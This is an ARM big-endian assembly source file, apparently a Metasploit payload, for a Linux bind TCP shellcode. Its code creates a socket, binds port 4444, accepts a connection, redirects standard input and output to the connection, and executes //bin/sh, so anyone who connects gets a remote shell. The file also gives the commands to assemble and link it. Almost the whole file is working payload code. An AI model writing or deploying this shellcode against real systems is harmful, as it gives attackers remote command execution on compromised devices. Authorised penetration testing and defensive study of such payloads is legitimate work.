118 lines
2.0 KiB
118 lines
2.0 KiB
@ Name: single_sock_bind
@ Qualities: -
@ Authors: Balazs Bucsay <@xoreipeip>
@ License: MSF_LICENSE
@ Description:
@ Implementation of a Linux bind TCP shellcode for ARM BE architecture.
@ Assemble with:
@ armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o
@ Link with:
@ armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode
@ Meta-Information:
@ meta-shortname=Linux Bind TCP
@ meta-description=Listen on a port for a connection and run a second stage
@ meta-authors=earthquake
@ meta-os=linux
@ meta-arch=armbe
@ meta-category=singles
@ meta-connection-type=bind
@ meta-name=bind_tcp
.section .text
.global _start
.code 32
@ Thumb-Mode on
add r6, pc, #1
bx r6
.code 16
@ _socket(2,1,0)
sub r2, r2, r2
add r1, r2, #1
add r0, r2, #2
lsl r7, r1, #8
add r7, r7, #0x19
svc 1
mov r6, r0
@ 1 uint8_t sin_len
@ 1 sa_family_t sin_family
@ 2 in_port_t sin_port
@ 4 struct in_addr sin_addr
@ 8 char sin_zero [8]
@ 00 02 5C11 00000000 00000000 00000000
@ 5c11 => 4444
@ _bind()
mov r2, #2
lsl r2, r2, #8
add r2, r2, #0x11
lsl r2, r2, #8
add r2, r2, #0x5C
sub r3, r3, r3
sub r4, r4, r4
sub r5, r5, r5
mov r1, sp
stm r1!, {r2-r5}
sub r1, #0x10
mov r2, #16
add r7, r7, #1
svc 1
@ _listen()
mov r0, r6
sub r1, r1, r1
add r7, r7, #2
svc 1
@ _accept()
mov r0, r6
sub r2, r2, r2
add r7, r7, #1
svc 1
mov r6, r0
@ _dup2()
sub r1, r1, r1
mov r7, #63
svc 1
mov r0, r6
add r1, r1, #1
svc 1
mov r0, r6
add r1, r1, #1
svc 1
sub r2, r2, r2
mov r0, pc
add r0, #18
@ next intstruction terminates the string beneath the code "//bin/sh"
@ in case you want to say goodbye to the null character
@ str r2, [r0, #8]
str r2, [sp, #8]
str r0, [sp, #4]
add r1, sp, #4
mov r7, #11
svc 1
@ _exit()
sub r4, r4, r4
mov r0, r4
mov r7, #1
svc 1
.ascii "//bin/sh\0"
@.ascii "//bin/sh"